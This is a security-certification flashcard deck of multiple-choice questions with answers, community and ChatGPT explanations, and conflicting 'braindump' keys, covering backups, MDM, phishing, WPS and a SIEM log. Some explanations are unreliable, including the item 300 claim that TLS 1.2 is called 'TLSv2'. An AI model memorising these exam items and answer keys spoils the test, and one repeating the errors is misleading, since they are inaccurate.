A VPC is the most suitable choice for designing a network that requires segmentation of production and development servers in a cloud environment. It allows for the creation of isolated subnets and provides the necessary tools to control and secure traffic between them, ensuring compliance with the security policy.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
283
Q

A new plug-and-play storage device was installed on a PC in the corporate environment. Which of the following safeguards will BEST help to protect the PC from malicious files on the storage device?

a. Change the default settings on the PC.
b. Define the PC firewall rules to limit access.
c. Encrypt the disk on the storage device.
d. Plug the storage device in to the UPS.

A

(Community A: 52%, C : 42%)
a. Change the default settings on the PC.
Option A protects the PC. Modifying the default settings on the PC which includes enabling auto-scanning of connected devices before use and preventing unauthorized software execution; can protect from malicious files on storage devices.

Option B is incorrect. Firewalls control network traffic, they don’t directly protect against malicious files.
Option C is incorrect! FDE protects data on the storage device from unauthorized use, but we want to protect the PC from malicious files, not the storage device.
Option D is irrelevant, it’s related to protection against power outages.

ChatGPT :
a. Change the default settings on the PC.
Explanation:

Change the default settings on the PC:

Purpose: By changing the default settings, you can control how the PC responds to plug-and-play devices. This includes disabling auto-run features and ensuring that any new storage device is scanned for malware before files are accessed.
Benefit: This minimizes the risk of automatically executing malicious files from the storage device and provides a layer of protection by requiring manual intervention or a malware scan before the device can be used.

Why Other Options Are Less Effective:

b. Define the PC firewall rules to limit access:

Purpose: Firewall rules control network traffic but do not directly address threats posed by files on a local storage device.
Limitation: While useful for network security, firewall rules do not prevent malicious files from being executed once the storage device is connected.

c. Encrypt the disk on the storage device:

Purpose: Encryption protects data on the storage device from unauthorized access.
Limitation: Encryption does not prevent malicious files from being executed. If the device is already infected, encryption does not mitigate the risk of the malware spreading.

d. Plug the storage device into the UPS:

Purpose: A UPS (Uninterruptible Power Supply) provides power backup and protects against power surges.
Limitation: This has no impact on the security of files on the storage device. It only ensures power stability for the PC.

Summary:

Changing the default settings on the PC to disable auto-run features and ensure thorough scanning of the storage device before access provides the best protection against malicious files. This proactive approach helps prevent malware from automatically executing and spreading from the plug-and-play device.

(Braindump : c. Encrypt the disk on the storage device.)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
284
Q

A company is adopting a BYOD policy and is looking for a comprehensive solution to protect company information on user devices. Which of the following solutions would BEST support the policy?

a. Mobile device management
b. Full-device encryption
c. Remote wipe
d. Biometrics

A

a. Mobile device management
Explanation:

Mobile device management (MDM):

Purpose: MDM solutions provide comprehensive management and security for mobile devices. They enable administrators to enforce security policies, deploy applications, monitor devices, and protect data.
Features:
    Security Policies: Enforce password policies, encryption, and other security measures.
    Remote Management: Remotely wipe or lock devices if they are lost or stolen.
    Application Control: Control which applications can be installed and used.
    Data Protection: Separate personal and company data, ensuring company information is secure.

Why Other Options Are Less Comprehensive:

b. Full-device encryption:

Purpose: Encrypts the entire device to protect data from unauthorized access.
Limitation: While important for data security, it does not provide comprehensive management or other protective measures needed for BYOD policies.

c. Remote wipe:

Purpose: Allows administrators to remotely delete data from a lost or stolen device.
Limitation: This is a useful feature but only one aspect of device management. It does not cover the full range of security and management needs.

d. Biometrics:

Purpose: Provides secure authentication using fingerprint, facial recognition, or other biometric methods.
Limitation: Enhances security for device access but does not address data protection, application control, or other management aspects.

Summary:

Mobile Device Management (MDM) provides a comprehensive approach to managing and securing user devices in a BYOD environment. It offers a wide range of features essential for protecting company information, enforcing security policies, and ensuring compliance with organizational standards.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
285
Q

A company wants to modify its current backup strategy to minimize the number of backups that would need to be restored in case of data loss. Which of the following would be the BEST backup strategy to implement?

a. Incremental backups followed by differential backups
b. Full backups followed by incremental backups
c. Delta backups followed by differential backups
d. Incremental backups followed by delta backups
e. Full backups followed by differential backups

A

e. Full backups followed by differential backups
Explanation:

Full Backups:

Purpose: A full backup captures the entire data set, creating a complete copy of all data.
Benefit: Simplifies the restoration process as it provides a single, comprehensive backup.

Differential Backups:

Purpose: A differential backup captures all the data that has changed since the last full backup.
Benefit: During restoration, you only need the last full backup and the most recent differential backup, minimizing the number of backups to restore.

Why This Strategy is Best:

Restoration Process: To restore data, you start with the full backup and then apply the latest differential backup. This reduces the complexity and time required for restoration compared to incremental backups, where you would need to restore the last full backup and every subsequent incremental backup in sequence.
Backup Frequency: Differential backups can be taken more frequently than full backups, providing a good balance between backup size and restoration ease.

Why Other Options Are Less Effective:

a. Incremental backups followed by differential backups:

This is an uncommon and complex strategy that would not simplify restoration.

b. Full backups followed by incremental backups:

Requires restoring the full backup plus each incremental backup since the last full backup, increasing the number of restores needed.

c. Delta backups followed by differential backups:

Delta backups capture only changes at the byte level, which can be very efficient but also more complex and not as widely used as incremental and differential backups.

d. Incremental backups followed by delta backups:

This is a complex strategy with a potentially high number of backups to restore, making the process cumbersome.

Summary:

Full backups followed by differential backups provide an efficient and simplified restoration process, minimizing the number of backups that need to be restored in the event of data loss.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
286
Q

The compliance team requires an annual recertification of privileged and non-privileged user access. However, multiple users who left the company six months ago still have access. Which of the following would have prevented this compliance violation?

a. Account audits
b. AUP
c. Password reuse
d. SSO

A

a. Account audits
Explanation:

Account Audits:

Purpose: Regularly auditing user accounts ensures that access rights are up-to-date and aligned with current business needs.
Process: During account audits, administrators can identify inactive or terminated user accounts and promptly revoke their access rights.
Benefits:
    Compliance: Helps in maintaining compliance with organizational policies and regulatory requirements that mandate regular access reviews.
    Security: Reduces the risk of unauthorized access by ensuring that only active employees have access to company resources.
    Efficiency: Streamlines access management processes by keeping user access permissions current.

Why Other Options Are Less Appropriate:

b. AUP (Acceptable Use Policy):

AUP defines acceptable behavior for users but does not directly manage user access or perform audits.

c. Password Reuse:

Password reuse policies aim to prevent users from using the same passwords across multiple accounts but do not address the issue of terminated users retaining access.

d. SSO (Single Sign-On):

SSO simplifies access management by allowing users to authenticate once to access multiple applications, but it does not directly manage or audit user accounts.

Summary:

Account audits are crucial for ensuring that access rights are aligned with current employment status and business needs. By conducting regular audits, organizations can proactively identify and address compliance violations such as terminated users retaining access rights, thereby enhancing overall security and compliance posture.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
287
Q

A company recently experienced a data breach and the source was determined to be an executive who was charging a phone in a public area. Which of the following would MOST likely have prevented this breach?

a. A firewall
b. A device pin
c. A USB data blocker
d. Biometrics

A

c. A USB data blocker
Explanation:

USB Data Blocker:

Purpose: USB data blockers prevent data exchange when a device is plugged into an unknown or potentially compromised USB port.
Functionality: They allow charging while blocking the data transfer pins, preventing unauthorized access and data theft.
Scenario Relevance: In the described scenario, if the executive had used a USB data blocker while charging the phone in a public area, it would have prevented unauthorized access and potential data breach through the USB connection.

Why Other Options Are Less Appropriate:

a. Firewall:

Firewalls are network security devices that monitor and control incoming and outgoing network traffic. They are not directly related to preventing unauthorized data access via USB connections.

b. Device PIN:

A device PIN provides security for unlocking the device itself but does not protect against unauthorized data transfer when connected to a potentially compromised USB port.

d. Biometrics:

Biometrics (such as fingerprint or facial recognition) provide authentication for unlocking the device but do not prevent unauthorized data transfer through a USB connection.

Summary:

Using a USB data blocker is the most effective measure in this scenario because it directly addresses the specific threat of unauthorized data access and transfer when charging devices in public or untrusted environments. This solution helps mitigate the risk of data breaches stemming from compromised USB ports or chargers, which are common attack vectors in public spaces.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
288
Q

The manager who is responsible for a data set has asked a security engineer to apply encryption to the data on a hard disk. The security engineer is an example of a __________.

a. data controller.
b. data owner.
c. data custodian.
d data processor.

A

c. data custodian.
Explanation:

Data Controller: Typically refers to the individual or entity that determines the purposes and means of processing personal data.
Data Owner: Refers to the individual or entity that has ultimate responsibility and control over the data, including its use and protection.
Data Custodian: Refers to the individual or entity responsible for the storage, maintenance, and protection of data. They manage and handle the data according to the instructions provided by the data owner or controller.
Data Processor: Refers to an entity or person that processes data on behalf of the data controller, following their instructions.

In this case, the security engineer is directly handling and securing the data by applying encryption on the hard disk. This role aligns with that of a data custodian, who is responsible for safeguarding data and ensuring its integrity and security as per organizational policies and guidelines.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
289
Q

An organization with a low tolerance for user inconvenience wants to protect laptop hard drives against loss or data theft. Which of the following would be the MOST acceptable?

a. SED
b. HSM
c. DLP
d. TPM

A

a. SED (Self-Encrypting Drive).
Explanation:

SED (Self-Encrypting Drive): SEDs automatically encrypt data on the drive using hardware-based encryption, which is transparent to the user and does not significantly impact performance. They protect data at rest, ensuring that if a laptop is lost or stolen, the data on the drive remains encrypted and inaccessible without the proper authentication credentials.

HSM (Hardware Security Module): HSMs are used for cryptographic key management and secure transaction processing. While they can be part of a security solution, they are not typically used directly to protect laptop hard drives against loss or data theft.

DLP (Data Loss Prevention): DLP solutions monitor and control the movement of sensitive data within and outside of an organization's network. They focus on preventing accidental or intentional data leaks rather than protecting data on individual laptop hard drives.

TPM (Trusted Platform Module): TPM is a hardware-based security feature that stores cryptographic keys and provides secure boot capabilities. It enhances platform security but is more focused on ensuring the integrity of the system's boot process and securing cryptographic operations rather than specifically protecting data on hard drives.

Therefore, considering the requirement for minimal user inconvenience and effective protection against data loss or theft from laptop hard drives, SED (Self-Encrypting Drive) would be the most suitable choice.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
290
Q

After segmenting the network, the network manager wants to control the traffic between the segments. Which of the following should the manager use to control the network traffic?

a. A DMZ
b. A VPN
c. A VLAN
d. An ACL

A

d. An ACL (Access Control List).
Explanation:

DMZ (Demilitarized Zone): A DMZ is a network segment that separates an internal network from an external network, typically used to host services accessible from the internet while adding an extra layer of security.

VPN (Virtual Private Network): A VPN creates a secure encrypted tunnel over a public network (usually the internet), allowing remote users to securely connect to a private network as if they were directly connected to it.

VLAN (Virtual Local Area Network): A VLAN logically divides a physical network into multiple virtual networks, enabling isolation of traffic within different segments of the network. However, VLANs alone do not provide traffic control between segments; they segregate traffic.

ACL (Access Control List): An ACL is a set of rules configured on a network device (such as a router or firewall) that filters traffic based on various criteria (such as source/destination IP addresses, ports, protocols). ACLs allow or deny traffic between network segments based on defined rules, providing granular control over network traffic flow.

Since the goal is to control traffic between already segmented networks, ACLs are the most appropriate choice. They enable the network manager to specify exactly what traffic is allowed or denied between different segments based on specific criteria, thereby enhancing security and network management.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
291
Q

Which of the following BEST describes when an organization utilizes a ready-to-use application from a cloud provider?

a. IaaS
b. SaaS
c. PaaS
d. XaaS

A

b. SaaS (Software as a Service)
Explanation:

IaaS (Infrastructure as a Service): Provides virtualized computing resources over the internet. Users typically manage their own operating systems, applications, and data, but the cloud provider manages the infrastructure, such as virtualization, servers, storage, and networking.

SaaS (Software as a Service): Delivers software applications over the internet on a subscription basis. The applications are hosted and managed by the service provider. Users access the application through a web browser without needing to install or maintain any software locally.

PaaS (Platform as a Service): Provides a platform allowing customers to develop, run, and manage applications without the complexity of building and maintaining the infrastructure typically associated with developing and launching an application.

XaaS (Everything as a Service): A broad term that encompasses all types of services delivered over the internet, including IaaS, SaaS, PaaS, and other types of services.

In this context, since the organization is utilizing a ready-to-use application directly from a cloud provider, SaaS is the most appropriate choice as it directly addresses the consumption of software applications delivered as a service over the internet.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
292
Q

Which of the following BEST helps to demonstrate integrity during a forensic investigation?

a. Event logs
b. Encryption
c. Hashing
d. Snapshots

A

c. Hashing
Explanation:

Event logs: Event logs record events that occur on a system or network, providing a chronological record of activities. While they are crucial for tracking actions and incidents, they do not directly ensure the integrity of data itself.

Encryption: Encryption is used to protect data confidentiality by converting plaintext into ciphertext, making it unreadable without the correct decryption key. While encryption protects data from unauthorized access, it does not provide a means to verify the integrity of the data itself.

Hashing: Hashing involves generating a fixed-size output (hash value) from input data of any size. The hash value uniquely represents the input data. Hash functions are designed so that even a small change in the input data results in a significantly different hash value. During a forensic investigation, hashing is used to verify data integrity. If the hash value of the original data matches the hash value calculated during the investigation, it confirms that the data has not been altered.

Snapshots: Snapshots capture the state of a system or data at a specific point in time. They are useful for restoring systems to a previous state but do not inherently verify the integrity of data.

Therefore, hashing is the most appropriate choice as it provides a reliable method to verify data integrity during forensic investigations by comparing hash values of original and acquired data to ensure data integrity and detect any unauthorized changes.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
293
Q

Which of the following would be MOST effective to contain a rapidly spreading attack that is affecting a large number of organizations?

a. Machine learning
b. DNS sinkhole
c. Blocklist
d. Honeypot

A

(Community : B 100%)
b. DNS sinkhole

A DNS (Domain Name System) sinkhole is a technique used to redirect malicious or unwanted traffic to a non-existent or controlled destination. By redirecting the traffic to a sinkhole, organizations can effectively contain the spread of the attack by preventing the malicious traffic from reaching its intended targets.

When an attack is rapidly spreading and affecting multiple organizations, a DNS sinkhole can be deployed at a network level to block access to malicious domains or IP addresses associated with the attack. This prevents infected systems from establishing connections with the attacker’s infrastructure, effectively containing the attack and limiting its impact on other organizations.

ChatGPT
b. DNS sinkhole
Explanation:

Machine learning: While machine learning can be effective in identifying patterns and anomalies, it is more suitable for detecting and predicting threats rather than containing ongoing attacks.

DNS sinkhole: A DNS sinkhole redirects malicious traffic to a designated IP address, effectively isolating the attack and preventing infected devices from communicating with malicious domains or servers. This containment mechanism can significantly reduce the impact of a widespread attack by disrupting the malicious infrastructure's ability to operate.

Blocklist: A blocklist contains known malicious IP addresses, domains, or URLs. While it can prevent access to known threats, it may not be sufficient to contain a rapidly spreading attack unless the specific malicious entities are well-documented and can be quickly added to the blocklist.

Honeypot: A honeypot is a decoy system designed to lure attackers and gather information about their methods. While useful for learning about attack techniques, honeypots do not directly contain or mitigate ongoing attacks affecting a large number of organizations.

Therefore, in the context of containing a rapidly spreading attack across multiple organizations, DNS sinkhole is the most appropriate choice as it can quickly disrupt the attack’s infrastructure and prevent further spread by redirecting malicious traffic to a controlled environment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
294
Q

A network administrator has been alerted that web pages are experiencing long load times. After determining it is not a routing or DNS issue, the administrator logs in to the router, runs a command, and receives the following output:

CPU 0 percent busy, from 300 sec ago
1 sec ave: 99 percent busy
5 sec ave: 97 percent busy
1 min ave: 83 percent busy

Which of the following is the router experiencing?

a. DDoS attack
b. Memory leak
c. Buffer overflow
d. Resource exhaustion

A

d. Resource exhaustion
Explanation:

DDoS attack: While a Distributed Denial of Service (DDoS) attack can lead to resource exhaustion, the output specifically indicates high CPU usage, which could be a result of many types of resource exhaustion scenarios, not just DDoS attacks.

Memory leak: This typically causes gradual degradation over time and leads to running out of memory rather than immediate high CPU usage.

Buffer overflow: This usually results in program crashes or unexpected behavior rather than high CPU usage.

Resource exhaustion: This is a general term for when a system’s resources (CPU, memory, etc.) are maxed out, leading to performance issues. The router's CPU is extremely busy (99% in the last second, 97% in the last 5 seconds, and 83% over the last minute), which fits the description of resource exhaustion.

Given the high CPU usage in the output, the router is likely experiencing resource exhaustion.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
295
Q

The Chief Executive Officer (CEO) of an organization would like staff members to have the flexibility to work from home anytime during business hours, including during a pandemic or crisis. However, the CEO is concerned that some staff members may take advantage of the flexibility and work from high-risk countries while on holiday or outsource work to a third-party organization in another country. The Chief Information Officer (CIO) believes the company can implement some basic controls to mitigate the majority of the risk. Which of the following would be BEST to mitigate the CEO’s concerns? (Choose two.)

a. Geolocation
b. Time-of-day restrictions
c. Certificates
d. Tokens
e. Geotagging
f. Role-based access controls

A

a. Geolocation
e. Geotagging

a. Geolocation

Geolocation can restrict access based on the geographical location of the user. This would ensure that employees can only access the company’s network from approved locations and prevent access from high-risk countries.

e. Geotagging

Geotagging can provide additional data about the location of the user’s device when they access company resources. This can help verify that employees are working from approved locations and not from high-risk areas or unauthorized countries.
Explanation:

Time-of-day restrictions: This would limit when employees can access the system, not where they access it from.
Certificates: While certificates enhance security, they do not address the location concerns.
Tokens: Tokens can help with authentication but do not mitigate concerns about location.
Role-based access controls: RBAC controls access based on user roles but does not address the issue of location or third-party outsourcing.

Using geolocation and geotagging together provides a robust approach to ensuring employees are working from permissible locations, thus addressing the CEO’s concerns effectively.

(Braindump : a. Geolocation
b. Time-of-day restrictions)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
296
Q

While checking logs, a security engineer notices a number of end users suddenly downloading files with the .tar.gz extension. Closer examination of the files reveals they are PE32 files. The end users state they did not initiate any of the downloads. Further investigation reveals the end users all clicked on an external email containing an infected MHT file with an href link a week prior. Which of the following is MOST likely occurring?

a. A RAT was installed and is transferring additional exploit tools.
b. The workstations are beaconing to a command-and-control server.
c. A logic bomb was executed and is responsible for the data transfers.
d. A fileless virus is spreading in the local network environment

A

a. A RAT was installed and is transferring additional exploit tools.
Explanation:

A RAT (Remote Access Trojan) can be installed on users' workstations when they click on an infected link or file. Once installed, the RAT allows an attacker to remotely control the infected machines and download additional malicious files or tools. The sudden download of PE32 files (Portable Executable files for Windows) disguised as .tar.gz (a compressed archive format) suggests that additional exploit tools or payloads are being downloaded to the compromised systems.

The workstations are beaconing to a command-and-control server: While beaconing to a C2 server is a common activity for compromised machines, the specific context of downloading PE32 files disguised as .tar.gz indicates more than just beaconing; it suggests active downloading of malicious files, which is more aligned with RAT behavior.

A logic bomb was executed and is responsible for the data transfers: Logic bombs are typically time-based or event-based triggers that execute malicious code. They do not generally involve downloading files from the internet unless specifically designed to do so.

A fileless virus is spreading in the local network environment: Fileless malware operates in memory and does not leave files on the disk, making it harder to detect. The scenario described involves downloading and identifying PE32 files, which are not indicative of fileless malware behavior.

Given the symptoms and actions described, the most likely occurrence is that a RAT was installed and is now being used to transfer additional exploit tools to the compromised systems.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
297
Q

A business is looking for a cloud service provider that offers a la carte services, including cloud backups, VM elasticity, and secure networking. Which of the following cloud service provider types should the business engage?

a. IaaS
b. PaaS
c. XaaS
d. SaaS

A

a. IaaS
Explanation:

IaaS (Infrastructure as a Service): This type of cloud service provider offers fundamental computing resources such as virtual machines (VMs), storage, and networking on a pay-as-you-go basis. Businesses can select specific services they need (a la carte), such as cloud backups, VM elasticity (scaling up or down as needed), and secure networking. This flexibility allows businesses to tailor their infrastructure according to their specific requirements.

PaaS (Platform as a Service): This provides a platform allowing customers to develop, run, and manage applications without dealing with the underlying infrastructure. PaaS is more focused on application development and may not offer the level of control over backups, VM management, and networking that the business is seeking.

XaaS (Anything as a Service): This is a broad category that includes any type of service delivered over the internet. While it encompasses IaaS, PaaS, and SaaS, it's not a specific service model and doesn't directly address the specific needs described.

SaaS (Software as a Service): This delivers software applications over the internet, on a subscription basis. SaaS providers manage the infrastructure and platforms that run the applications, but it does not provide the level of control over backups, VM management, and networking that IaaS offers.

Therefore, for a business looking for cloud backups, VM elasticity, and secure networking on an a la carte basis, IaaS is the most appropriate choice.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
298
Q

A research company discovered that an unauthorized piece of software has been detected on a small number of machines in its lab. The researchers collaborate with other machines using port 445 and on the Internet using port 443. The unauthorized software is starting to be seen on additional machines outside of the lab and is making outbound communications using HTTPS and SMB. The security team has been instructed to resolve the problem as quickly as possible while causing minimal disruption to the researchers. Which of the following contains the BEST course of action in this scenario?

a. Update the host firewalls to block outbound SMB.
b. Place the machines with the unapproved software in containment.
c. Place the unauthorized application in a blocklist.
d. Implement a content filter to block the unauthorized software communication.

A

b. Place the machines with the unapproved software in containment.
Explanation:

Containment: Isolating the machines with the unauthorized software is the quickest and most effective way to prevent the spread of the software while allowing the researchers to continue their work. This action minimizes disruption by keeping unaffected machines operational while containing the potential threat.

Update the host firewalls to block outbound SMB: This could help to some extent, but it would not address the outbound HTTPS communications, which could still allow the unauthorized software to communicate and spread.

Place the unauthorized application in a blocklist: This can be part of the solution, but it may not be as immediate or effective in stopping the spread if the software is already running on multiple machines. Moreover, creating and distributing a blocklist could take some time and may not be comprehensive if the unauthorized software has multiple variants.

Implement a content filter to block the unauthorized software communication: This could also help, but it might require more time to configure properly and may not immediately stop the spread if the software uses encrypted communications that are harder to filter effectively.

By containing the affected machines, the security team can prevent further spread and analyze the software in a controlled environment, then proceed with additional steps such as removal, blocklisting, or firewall updates as necessary.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
299
Q

A security analyst has been reading about a newly discovered cyberattack from a known threat actor. Which of the following would BEST support the analyst’s review of the tactics, techniques, and protocols the threat actor was observed using in previous campaigns?

a. Security research publications
b. The MITRE ATT&CK framework
c. The Diamond Model of Intrusion Analysis
d. The Cyber Kill Chain

A

b. The MITRE ATT&CK framework
Explanation:

The MITRE ATT&CK framework: This framework provides a comprehensive and detailed knowledge base of adversary tactics, techniques, and procedures (TTPs) used in cyberattacks. It is specifically designed to help security professionals understand and analyze the methods used by threat actors in previous campaigns, making it the best tool for the analyst's needs.

Security research publications: While valuable, they may not provide a systematic and structured analysis of tactics and techniques across different threat actors and campaigns.

The Diamond Model of Intrusion Analysis: This model is useful for understanding the relationships between adversaries, capabilities, infrastructure, and victims, but it does not provide the same detailed catalog of TTPs as the MITRE ATT&CK framework.

The Cyber Kill Chain: This model outlines the stages of a cyberattack but does not provide the same level of detail on specific tactics, techniques, and protocols used by threat actors as the MITRE ATT&CK framework does.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
300
Q

A security analyst is hardening a network infrastructure. The analyst is given the following requirements:

*Preserve the use of public IP addresses assigned to equipment on the core router.
*Enable “in transport” encryption protection to the web server with the strongest ciphers.

Which of the following should the analyst implement to meet these requirements? (Choose two.)

a. Configure VLANs on the core router.
b. Configure NAT on the core router.
c. Configure BGP on the core router.
d. Enable AES encryption on the web server.
e. Enable 3DES encryption on the web server.
f. Enable TLSv2 encryption on the web server.

A

(Braindump : b. Configure NAT on the core router. f. Enable TLSv2 encryption on the web server.)

d. Enable AES encryption on the web server.
f. Enable TLSv2 encryption on the web server.

Here’s why these choices are appropriate:

Enable AES encryption on the web server: AES (Advanced Encryption Standard) is a strong encryption algorithm widely used to secure data in transit. Enabling AES ensures that data between clients and the web server is encrypted with a highly secure cipher.

Enable TLSv2 encryption on the web server: TLS (Transport Layer Security) version 1.2 or higher (commonly referred to as TLSv2) is the current standard for secure communication over networks. It provides robust encryption, ensuring that data in transit is protected with the strongest available encryption protocols.

Let’s briefly review the other options:

Configure VLANs on the core router: VLANs are used to segment network traffic but do not address the requirements of preserving public IP addresses or enabling encryption.

Configure NAT on the core router: Network Address Translation (NAT) would change the public IP addresses to private ones for internal use, which does not meet the requirement of preserving the use of public IP addresses.

Configure BGP on the core router: Border Gateway Protocol (BGP) is used for routing between autonomous systems on the internet. It does not address encryption or the specific requirement of using public IP addresses on equipment.

Enable 3DES encryption on the web server: While 3DES is an encryption algorithm, it is considered weaker and less efficient compared to AES. Thus, it does not meet the requirement of using the strongest ciphers.

Therefore, enabling AES encryption and TLSv2 on the web server will meet the requirements of providing strong “in transport” encryption and preserving the use of public IP addresses.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
301
Q

A security analyst is investigating an incident to determine what an attacker was able to do on a compromised laptop. The analyst reviews the following SIEM log:

Host Event ID Event Source Description
PC1 865 Microsoft-windows- C:\adsf234\adsf234.exe was blocked by
SoftwareRestricitonPolicies Group Policy
PC1 4688 Microsoft-windows-Security- A new process has been created. New
Auditing Process Name: powershell.exe
Creator Process Name : outlook.exe
PC1 4688 Microsoft-windows-Security- A new process has been created. New
Auditing Process Name: lat.ps1
Name : powershell.exe
PC1 4625 Microsoft-windows-Security- An account failed to log on.
Auditing LogonType: 3
SecurityID:Null SID
Workstation Name: PC1
Authentication Package Name : NTLM

Which of the following describes the method that was used to compromise the laptop?

a. An attacker was able to move laterally from PC1 to PC2 using a pass-the-hash attack.
b. An attacker was able to bypass application whitelisting by emailing a spreadsheet attachment with an embedded PowerShell in the file.
c. An attacker was able to install malware to the C:\asdf234 folder and use it to gain administrator rights and launch Outlook.
d. An attacker was able to phish user credentials successfully from an Outlook user profile

A

b. An attacker was able to bypass application whitelisting by emailing a spreadsheet attachment with an embedded PowerShell in the file.

The SIEM log provides clues about the method used to compromise the laptop. Let’s break down the log events:

Event ID 865 (Software Restriction Policies): Indicates that C:\adsf234\adsf234.exe was blocked by Group Policy. This shows that there was an attempt to run an executable that was blocked.

Event ID 4688 (Security Auditing):
    The first 4688 event shows that a new process, powershell.exe, was created, initiated by outlook.exe.
    The second 4688 event shows that another new process, lat.ps1, was created, with powershell.exe as the parent process.

Event ID 4625 (Security Auditing): Indicates a failed login attempt using NTLM with LogonType 3 (network logon), which shows an unauthorized access attempt.

Given these events, let’s analyze the options:

a. An attacker was able to move laterally from PC1 to PC2 using a pass-the-hash attack.

There is no evidence in the logs of lateral movement or pass-the-hash activity.

b. An attacker was able to bypass application whitelisting by emailing a spreadsheet attachment with an embedded PowerShell in the file.

This option aligns with the logs showing powershell.exe being started by outlook.exe, indicating that a malicious email could have initiated a PowerShell script.

c. An attacker was able to install malware to the C:\asdf234 folder and use it to gain administrator rights and launch Outlook.

The logs show that adsf234.exe was blocked, not executed. There is no indication that this executable was successfully run to gain administrator rights.

d. An attacker was able to phish user credentials successfully from an Outlook user profile.

The logs do not indicate successful credential phishing. Instead, they show failed login attempts.

Based on the log analysis, the most accurate description of the method used to compromise the laptop is:

b. An attacker was able to bypass application whitelisting by emailing a spreadsheet attachment with an embedded PowerShell in the file.

This aligns with the evidence of powershell.exe being initiated by outlook.exe, which suggests a potential malicious email attachment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
302
Q

A security analyst discovers that a company’s username and password database was posted on an Internet forum. The usernames and passwords are stored in plain text. Which of the following would mitigate the damage done by this type of data exfiltration in the future?

a. Create DLP controls that prevent documents from leaving the network.
b. Implement salting and hashing.
c. Configure the web content filter to block access to the forum.
d. Increase password complexity requirements.

A

b. Implement salting and hashing.

Here’s why:

Salting and Hashing: Storing passwords in plain text is a major security vulnerability. By implementing salting and hashing, passwords are transformed into a fixed-length string of characters, which does not directly reveal the original password. Salting adds an additional layer of security by adding a unique value to each password before hashing, making it more difficult for attackers to use precomputed tables (rainbow tables) to reverse the hash back to the original password. This makes it significantly harder for attackers to exploit the stolen password data.

The other options, while potentially useful in certain contexts, do not address the core issue of protecting passwords in storage:

DLP Controls: While Data Loss Prevention (DLP) controls can help prevent sensitive documents from leaving the network, they do not specifically address the secure storage of passwords.

Web Content Filter: Configuring a web content filter to block access to the forum where the data was posted does not prevent the initial exposure of the passwords or secure them in storage.

Password Complexity Requirements: Increasing password complexity can make passwords harder to guess but does not protect them if they are stored in plain text and subsequently stolen.

Therefore, implementing salting and hashing is the most effective way to mitigate the damage of future data exfiltration incidents involving passwords.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
303
Q

Joe, an employee, receives an email stating he won the lottery. The email includes a link that requests a name, mobile phone number, address, and date of birth be provided to confirm Joe’s identity before sending him the prize. Which of the following BEST describes this type of email?

a. Spear phishing
b. Whaling
c. Phishing
d. Vishing

A

c. Phishing

Here’s an explanation:

Phishing: This is a broad term for fraudulent attempts to obtain sensitive information such as personal details, usernames, passwords, and credit card numbers by disguising as a trustworthy entity in electronic communications. In this case, the email pretending that Joe has won a lottery and asking for his personal information is a classic example of phishing.

The other options describe more specific types of phishing or related attacks:

Spear Phishing: This is a targeted form of phishing where the attacker customizes the email to a specific individual or organization, often using personal information to make the attack more convincing. There is no indication that Joe was specifically targeted; it seems more like a general phishing attempt.

Whaling: This type of phishing targets high-profile individuals such as executives or senior officials. There is no indication that Joe is a high-profile individual, so this does not fit the description.

Vishing: This is a form of phishing that uses voice communication (phone calls) instead of emails. Since the attack described involves an email, it does not qualify as vishing.

Therefore, the best description for the email Joe received is phishing.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
304
Q

A company deployed a WiFi access point in a public area and wants to harden the configuration to make it more secure. After performing an assessment, an analyst identifies that the access point is configured to use WPA3, AES, WPS, and RADIUS. Which of the following should the analyst disable to enhance the access point security?

a. WPA3
b. AES
c. RADIUS
d. WPS

A

d. WPS

Here’s an explanation:

WPA3: This is the latest and most secure WiFi encryption protocol currently available. Disabling WPA3 would reduce security.

AES: Advanced Encryption Standard (AES) is a strong encryption algorithm used to protect WiFi communications. Disabling AES would weaken security.

RADIUS: Remote Authentication Dial-In User Service (RADIUS) is used for authentication and authorization in a secure manner, especially in enterprise environments. Disabling RADIUS would decrease security.

WPS: Wi-Fi Protected Setup (WPS) is a network security standard that attempts to allow users to easily secure a wireless home network. However, WPS has known vulnerabilities that can be exploited by attackers to gain unauthorized access to the network. Disabling WPS improves security by removing these vulnerabilities.

Therefore, disabling WPS is the best option to enhance the security of the WiFi access point.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
305
Q

Which of the following would be used to find the MOST common web-application vulnerabilities?

a. OWASP
b. MITRE ATT&CK
c. Cyber Kill Chain
d. SDLC

A

a. OWASP (Open Web Application Security Project)

Here’s an explanation:

OWASP: The Open Web Application Security Project provides a list of the top ten most critical web application security risks. It is widely used and recognized in the industry as a primary source for identifying common web-application vulnerabilities and understanding how to address them.

MITRE ATT&CK: This framework provides a comprehensive matrix of tactics, techniques, and procedures used by attackers. While it is an excellent resource for understanding how attacks are carried out, it is not specifically focused on web-application vulnerabilities.

Cyber Kill Chain: This model describes the stages of a cyber attack but does not specifically focus on web-application vulnerabilities.

SDLC (Software Development Life Cycle): This is a process for planning, creating, testing, and deploying an information system. While secure SDLC practices help in mitigating vulnerabilities, it is not a resource for identifying the most common web-application vulnerabilities.

Therefore, OWASP is the most appropriate choice for finding the most common web-application vulnerabilities.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
306
Q

